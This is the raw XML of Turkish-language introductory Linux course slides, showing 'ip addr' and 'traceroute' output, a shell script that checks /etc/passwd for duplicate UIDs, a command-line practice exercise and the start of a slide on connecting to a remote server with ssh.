              <a:t>1: lo: &lt;LOOPBACK,UP,LOWER_UP&gt; mtu 65536 qdisc noqueue state   UNKNOWN group default qlen 1000</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link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00</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inet 127.0.0.1/8 scope host lo</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valid_lft forever preferred_lft forever</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inet6 ::1/128 scope host</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valid_lft forever preferred_lft forever</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2: eth0: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt; mtu 1500 qdisc pfifo_fast state UP group default qlen 1000</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link/ether 08:00:27:15:db:08 brd ff:ff:ff:ff:ff:ff</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inet 192.168.1.3/24 brd 192.168.1.255 scope global dynamic eth0</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valid_lft 86000sec preferred_lft 86000sec</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inet6 fe80::a00:27ff:fe15:db08/64 scope link</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valid_lft forever preferred_lft forever</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="900">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="370" name="Google Shape;370;p48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4695347" y="679925"/>
            <a:ext cx="43008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ip addr show</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="371" name="Google Shape;371;p48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152325" y="1280550"/>
            <a:ext cx="4247400" cy="3386400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:srgbClr val="434343"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="0" lIns="0" spcFirstLastPara="1" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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traceroute to google</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="900">
                <a:solidFill>
                  <a:srgbClr val="DF3079"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>.com</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="900">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </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172.217</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3.14</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30</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="900">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> hops max,</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="900">
                <a:solidFill>
                  <a:srgbClr val="DF3079"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>60</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="900">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> byte packets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192.168.1.1</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192.168</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1.1</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1.234</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2.345</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3.456</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2</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10.0.0.1</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10.0</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0.1</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4.567</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5.678</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6.789</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3</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="900">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>  isp-gateway (ISP_IP) </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="900">
                <a:solidFill>
                  <a:srgbClr val="DF3079"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>7.890</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8.901</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9.012</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4</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="900">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>  some-router (Router_IP) </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="900">
                <a:solidFill>
                  <a:srgbClr val="DF3079"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>10.123</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11.234</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12.345</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5</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="900">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>  another-router(Another_Router_IP) </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="900">
                <a:solidFill>
                  <a:srgbClr val="DF3079"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>13</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14.5</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15.6</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6</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="900">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>  google-gw (Google_Gateway_IP) </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="900">
                <a:solidFill>
                  <a:srgbClr val="DF3079"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>16.7</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17.8</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18.9</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7</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108.170.253.97</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108.170</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253.97</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19.0</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20.1</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21.2</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8</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209.85.143.102</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209.85</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143.102</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22</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23</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24.56</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a:p>
            <a:pPr indent="0" lvl="0" marL="91440" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pP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9</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="900">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>  muc03s01-in</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="900">
                <a:solidFill>
                  <a:srgbClr val="DF3079"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>.1e100.net</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172.217</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="900">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="900">
                <a:solidFill>
                  <a:srgbClr val="DF3079"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>3.14</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="900">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="900">
                <a:solidFill>
                  <a:srgbClr val="DF3079"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>25</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26</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="900">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> ms </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="900">
                <a:solidFill>
                  <a:srgbClr val="DF3079"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>27</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="900">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> ms</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="900">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="372" name="Google Shape;372;p48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152321" y="679925"/>
            <a:ext cx="4247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traceroute google.com</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76" name="Shape 376"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="377" name="Google Shape;377;p49"/>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Shell scriptler</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="378" name="Google Shape;378;p49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="171450" y="679925"/>
            <a:ext cx="44745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bash </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>check</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>.sh</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="379" name="Google Shape;379;p49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4730375" y="679925"/>
            <a:ext cx="4171800" cy="39651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betik;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/etc/passwd dosyasındaki UID'leri alır,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bunları sıralar,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ardından uniq komutu ile tekrar eden UID'leri bulur.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Eğer tekrar eden UID'ler bulunursa,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ilgili kullanıcıları listeler. </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betiği çalıştırmadan önce, uygun izinlere sahip olmalısınız (örneğin, root olarak çalıştırabilirsiniz).</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="380" name="Google Shape;380;p49"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="195900" y="1240125"/>
            <a:ext cx="4425576" cy="340487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84" name="Shape 384"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="385" name="Google Shape;385;p50"/>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Son bir özet</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="386" name="Google Shape;386;p50"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="3053" t="9820"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="1026863"/>
            <a:ext cx="8569249" cy="3309838"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="387" name="Google Shape;387;p5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Joy Payton</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="FFF2CC"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="388" name="Google Shape;388;p50"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6178122" y="714763"/>
            <a:ext cx="2836828" cy="371397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2" name="Shape 392"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="393" name="Google Shape;393;p51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152275" y="0"/>
            <a:ext cx="8730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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Temel linux komutları uygulamasını tamamlayın</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="394" name="Google Shape;394;p51"/>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0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> $</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="395" name="Google Shape;395;p51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="171350" y="1245950"/>
            <a:ext cx="8730900" cy="3323100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2E3436"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="182875">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buChar char="❏"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Linux Temel Komutlar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>” uygulama </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dokümanında</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> istenen görevleri yerine getiren linux komutlarını yazın.</a:t>
            </a:r>
            <a:endParaRPr sz="20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60F"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="400" name="Shape 400"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="401" name="Google Shape;401;p5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3"/>
              </a:rPr>
              <a:t>https://cmdchallenge.com/</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="FFF2CC"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="402" name="Google Shape;402;p52"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="248100" y="0"/>
            <a:ext cx="7752600" cy="51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200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>🚀 Uygulama : </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Linux command challenge</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="403" name="Google Shape;403;p52"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="7638" l="0" r="1883" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="123925" y="723600"/>
            <a:ext cx="8828174" cy="3771000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="404" name="Google Shape;404;p52"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3463975" y="853000"/>
            <a:ext cx="5088600" cy="38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50"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://cmdchallenge.com/</a:t>
            </a:r>
            <a:endParaRPr sz="2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60F"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="409" name="Shape 409"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="410" name="Google Shape;410;p53"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="3034" t="10007"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="215750" y="1499375"/>
            <a:ext cx="8421425" cy="3245400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="411" name="Google Shape;411;p5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Joy Payton</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="FFF2CC"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="412" name="Google Shape;412;p53"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152275" y="0"/>
            <a:ext cx="7848300" cy="51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200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Uzaktaki sunucuya bağlanma : ssh komutu</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="413" name="Google Shape;413;p53"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4294967295" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="206550" y="789438"/>
            <a:ext cx="8730900" cy="434400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2E3436"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="0" lIns="0" spcFirstLastPara="1" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>$ ssh </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2000" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
                <a:hlinkClick r:id="rId5">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
